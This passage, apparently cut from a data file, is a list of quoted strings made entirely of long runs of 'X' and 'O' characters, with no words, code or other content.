XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXX